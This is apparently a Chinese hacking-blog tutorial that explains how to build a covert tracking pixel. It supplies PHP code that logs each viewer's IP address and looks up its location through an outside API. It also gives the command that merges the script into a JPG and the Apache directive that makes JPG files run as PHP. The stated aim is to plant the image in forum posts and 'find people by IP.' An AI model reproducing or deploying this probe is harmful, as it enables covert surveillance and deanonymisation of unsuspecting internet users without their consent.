渗透测试 - 黑客技术 | 我是如何获取到你真实上网地址的

摘要：这是个老技术，只是拿出来跟大家一起讨论更多猥琐的探针思路。通过IP找人也是很给力的途径。原标题：一颗赛艇！我是如何获取到你真实上网地址的附POC

这是个老技术只是拿出来跟大家一起讨论更多猥琐的探针思路。

通过IP找人也是很给力的途径

有图有真相

我是如何获取到你真实上网地址的

01 - 准备阶段

首先我们列一下需要准备的清单。

一台公网的服务器最垃圾的VPS都行。
搭上php环境和中间件我这是用的 phpstudy一键安装包
1像素图片一张
PHP简单IDE 我这里用的是NOTEPAD++

现在开搞

我们捋一捋思路就是通过插入1像素图片的方式让浏览网页的吃瓜对象跑到我们服务器上去留下脚印(ip)

然后通过接口获取IP的地理归属位置。

1像素的图片我一会在打包的附件里给出。

第一我们先搞定处理IP到地理位置的php文件。

我这里命名为test.php

源代码如下:

			
									1
								
									2
								
									3
								
									4
								
									5
								
									6
								
									7
								
									8
								
									9
								
									10
								
									11
								
									12
								
									13
								
									14
								
									15
								
									16
								
									17
								
									18
								
									19
								
									20
								
									21
								
									22
								
									23
								
									24
								
									25
								
									26
								
									27
								
									28
								
									29
								
									'Content-Type:text/html;charset=utf-8');
								
									    function get_addr($_ip) { 
								
									        $_ip=array("X-Forwarded-For:{$_ip}");
								
									            //初始化curl模块 
								
									        $curl = curl_init();
								
									        //需要获取的URL地址也可以在 curl_init() 函数中设置。
								
									        curl_setopt($curl, CURLOPT_URL, 'http://ip.zishuo.net/');
								
									        //在启用 CURLOPT_RETURNTRANSFER 的时候返回原生的Raw输出。
								
									        curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
								
									        //设置"User-Agent: "头
								
									        curl_setopt($curl, CURLOPT_USERAGENT  , 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36');
								
									        curl_setopt($curl, CURLOPT_HTTPHEADER, $_ip);
								
									        //执行cURL
								
									        curl_exec($curl); 
								
									        //关闭cURL资源并且释放系统资源 
								
									        $retn=curl_exec($curl); 
								
									        curl_close($curl);
								
									        return json_decode($retn);
								
									    } 
								
									    $_addr=get_addr($_GET['ip']);
								
									    if ($_addr->code=='200') {
								
									        echo $_addr->desc.'->'.$_addr->position;
								
									    }elseif($_addr->code=='404'){
								
									        echo $_addr->message;
								
									    }else{
								
									        echo '异常!';
								
									    }
								
									?>

http://ip.zishuo.net/

这个是我随便找到接口地址大家可以八仙过海

然后处理一像素探针图片

可以用生成图片马的方式,把1.php和1.jpg合体

			
									1
								
									copy 1.jpg+1.php 2.jpg

其中1.php为获取对方来路IP的关键页面。

源码如下:

			
									1
								
									2
								
									3
								
									4
								
									5
								
									6
								
									7
								
									8
								
									9
								
									10
								
									'Content-Type:text/html;charset=utf-8'); 
								
									$_ip=$_SERVER['REMOTE_ADDR']; 
								
									$_ip_addr=file_get_contents('http://127.0.0.1/test.php?ip='.$_ip); 
								
									$fh = fopen('ip.txt', 'a'); 
								
									fwrite($fh, 'IP:'.$_ip.' Time:'.date("Y-m-d H:i",time()+28800).' Address:'.$_ip_addr."\r\n"); fclose($fh); 
								
									$im = imagecreatefromjpeg("n00b.png"); 
								
									header('Content-Type: image/jpeg'); 
								
									imagejpeg($im); 
								
									imagedestroy($im); 
								
									?>

http://127.0.0.1/test.php?ip=

这个可以不变也可以换成远端接口

然后把两者传到服务器上

放置一个目录下
我是如何获取到你真实上网地址的
把图片改个名字隐藏一下~

然后在此目录下建一个ip.txt的文本文件。

02- 更改中间件配置

下面是关键的一步

我们要修改Apache的配置让他把jpg文件当php来执行~
我是如何获取到你真实上网地址的
这样我们就可嘿嘿嘿了

如图所示

我是如何获取到你真实上网地址的
在这个位置插入一行代码

			
									1
								
									AddType application/x-httpd-php .jpg

然后重启Apache!

03 - 发射阶段

我们把自己的图片探针的地位给记录一下

比如我的

http://dsb123.com/images/djdia92ndjfui12jn.jpg

随便找个发帖的论坛试试

插入远程图片~
我是如何获取到你真实上网地址的
一般都会成功哒

我们看看成果

最后所有的文件都在附件里~

链接: http://pan.baidu.com/s/1pLk1OgV 密码: 86q4

黑客

我是如何获取到你真实上网地址的

01 - 准备阶段

02- 更改中间件配置

03 - 发射阶段

相关文章